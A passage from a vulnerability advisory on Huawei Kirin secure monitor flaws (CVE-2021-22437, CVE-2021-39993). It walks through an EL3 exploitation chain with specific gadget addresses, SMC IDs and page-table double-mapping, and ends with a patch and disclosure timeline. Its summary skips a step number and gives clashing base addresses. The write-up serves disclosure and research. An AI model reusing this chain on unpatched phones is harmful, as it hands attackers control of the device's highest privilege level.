By using our memset primitive to set the least significant byte to 0, we are able to change the pointer value from 0x1400382C to 0x14003800 (the above gadget). This is achieved in our exploit by performing the operations listed below.

Set the 11th bit in the quad-word at 0xFFF0A434 so that get_hisee_state returns true.
Call HISEE_SMC_INIT with a buffer size of 0x18+1 (since 0x18 will be subtracted from it)
Set the addr field of the control structure from the kernel to 0x140281A0, our function pointer.
Trigger the memset of the function pointer LSB by invoking the HISEE_SMC_GET_LOG command.

Now let's detail how we can leverage this gadget to build stronger primitives.

The function pointer we hijacked is used in bl31_secap_handler (0x14003838), which is just a wrapper for the SMC handlers in the bl31_secap_smc_handlers array. The arguments passed from NS-EL1, except for smc_fid, are moved into X0-X3 at the call site.

0x1400394c:  mov x2, x3
0x14003950:  mov x0, x22
0x14003954:  mov x1, x21
0x14003958:  mov x3, x4
0x1400395c:  blr x6        /* address of the blr x2 gadget */

Looking at the assembly calling the handler (now our BLR X2 gadget), we can see that we control the following registers:

X0 == X22
X1 == X21
X2
X3 == X4

X2 must contain the address of the gadget we will jump to after calling the BLR X2 gadget. Now we just need to find an interesting gadget that uses any of the other registers we control to enhance our current primitive.

We'll start by looking for an arbitrary write gadget.

Basic Arbitrary Write

Once again, in a code base as large as the monitor, it's not too hard to find such a gadget. However, we still need to take into account the fact that the branch instruction is a BLR, meaning that we lose the original return address in the LR register. Nonetheless, we can reuse the same technique as in our first exploit: the return address stored in the bl31_secap_handler's stack frame can be retrieved by using a gadget with the same epilogue (or at least the same stack frame size). This way, we can return cleanly to the runtime service dispatcher.

The epilogue of bl31_secap_handler below adds 0x50 bytes to the stack before returning:

0x14003974:  ldp x19, x20, [sp,#0x10]
0x14003978:  ldp x21, x22, [sp,#0x20]
0x1400397c:  ldp x29, x30, [sp],#0x50
0x14003980:  ret

The arbitrary write gadget we're using, found at address 0x14001850, does the same thing and will therefore return properly:

0x14001850:  str w21, [x0]
0x14001854:  ldr x25, [sp,#0x40]
0x14001858:  ldp x21, x22, [sp,#0x20]
0x1400185c:  ldp x29, x30, [sp],#0x50
0x14001860:  ret

At this stage, once we have replaced the SMC handler pointer with the address of our BLR X2 gadget, we can now call the corresponding SMC from the kernel with the arguments listed below and start using our arbitrary write.

X0: the hijacked SMC ID, 0xCA000008;
X1: the address we want to write to;
X2: the value we want to write;
X3: the address of the arbitrary write gadget to be called by the BLR X2 gadget.

Full Arbitrary Read-Write

The next step of the exploit is to get better read/write primitives by modifying yet again the SMC handler pointers of bl31_secap_svc.

The handler pointer for SMC 0xCA000002 (at address 0x14028190) is changed to 0x14001A74, which is an arbitrary read gadget:

0x14001a74:  ldr w0, [x0,x1]
0x14001a78:  ret

The handler pointer for SMC 0xCA000008 (at address 0x140281A0) is changed to 0x1400AC70, which is an arbitrary write gadget:

0x1400ac70:  str x1, [x0]
0x1400ac74:  ret

At this stage, we have stable read/write primitives and we can now start working towards arbitrary code execution.

Double Mapping the Secure Monitor

To get code execution in the secure monitor, we use the same strategy as in our first exploit: map the secure monitor a second time as writable. The third-level EL3 page table mapping the secure monitor's code and data sections is located by finding the descriptors mapping the physical address 0x14000000. The double mapping is achieved by copying the descriptors into the unused space of the page table and changing the AP and PXN bits of the new descriptors. This read-write mapping, starting at virtual address 0x14058000, can then be used to patch the monitor code.

Getting Code Execution in EL3

Finally, we change the first handler pointer (for the SMC 0xCA000001) in bl31_secap_smc_handlers to 0x14003140, write our shellcode at this address, and call this SMC to hijack the secure monitor and get code execution at EL3.

Exploitation Summary

Step 0: The integer overflow in HISEE_SMC_INIT and the kernel-controlled hlog_header shared structure are paired to craft a limited arbitrary write. This limited primitive is not enough to take direct control of the secure monitor, but it can first be used to craft a bzero primitive.

Step 1: When logs are copied from the secure monitor to the kernel-shared memory buffer, the function memcpy_s is used. To create a bzero primitive, we abuse an error case of memcpy_s where it calls reset_memory to reset the destination memory region. However, for reset_memory to return successfully, the 11th bit of the dword at address 0xFFF0A434 needs to be set, which is ensured by calling using our limited write primitive.

Step 2: Our bzero primitive can now be used to modify writable data in the secure monitor's address space from the kernel. In our exploit, we targeted the function pointers of the bl31_secap_svc runtime service.

Step 3: By setting the least significant byte of the third function pointer 0x1400382C, we can redirect the SMC handler to a BLR X2 gadget found at address 0x14003800.

Step 5: We can now use this temporary write gadget to craft a write primitive, by replacing the function pointer of the first SMC handler by the address of a read gadget.

Step 6: We do the same thing for the second function pointer of the runtime service and replace it with the address of an arbitrary write gadget.

Step 7: We then use the read primitive to locate the EL3 page tables. In one of the pages, we find the descriptor that maps the virtual address 0x14200000, the base address of the secure monitor.

Affected Devices

We have verified that the vulnerability impacted the following device(s):

Kirin 710: P30 Lite (MAR)
Kirin 970: P20 Pro (EML)

Please note that other models might have been affected.

Patch

The first vulnerability, the integer overflow, was assigned CVE-2021-22437 and patched in the September 2021 security update. The second vulnerability, the shared control structure, was assigned CVE-2021-39993 and patched in the December 2021 security update.

Timeline

May 31, 2021 - A vulnerability report is sent to Huawei PSIRT.
Jun. 18, 2021 - Huawei PSIRT acknowledges the vulnerability report.
Sep. 01, 2021 - The first issue is fixed in the September 2021 update.
Dec. 01, 2021 - The second issue is fixed in the December 2021 update.

This advisory contains information about the following vulnerabilities:

CVE-2021-39994 SMC SE Factory Check OOB Access
CVE-2021-22437 SMC MNTN OOB Access (Integer Overflow)
CVE-2021-39993 SMC MNTN OOB Access (Shared Control Structure)

Huawei Secure Monitor Vulnerabilities

SMC SE Factory Check OOB Access

Vulnerability Details

Exploitation

Disabling the CMA Whitelist

Hijacking an SMC Handler Pointer

Temporary Write Primitive

Stable Read/Write Primitives

Double Mapping the Secure Monitor

Getting Code Execution in EL3

Exploitation Summary

Affected Devices

Patch

Timeline

SMC MNTN OOB Access

Vulnerability Details

Integer Overflow

Shared Control Structure

Exploitation

Arbitrary Memset Primitive

Arbitrary Read-Write Primitives

Control-Flow Hijacking

Basic Arbitrary Write

Full Arbitrary Read-Write

Double Mapping the Secure Monitor

Getting Code Execution in EL3

Exploitation Summary

Affected Devices

Patch

Timeline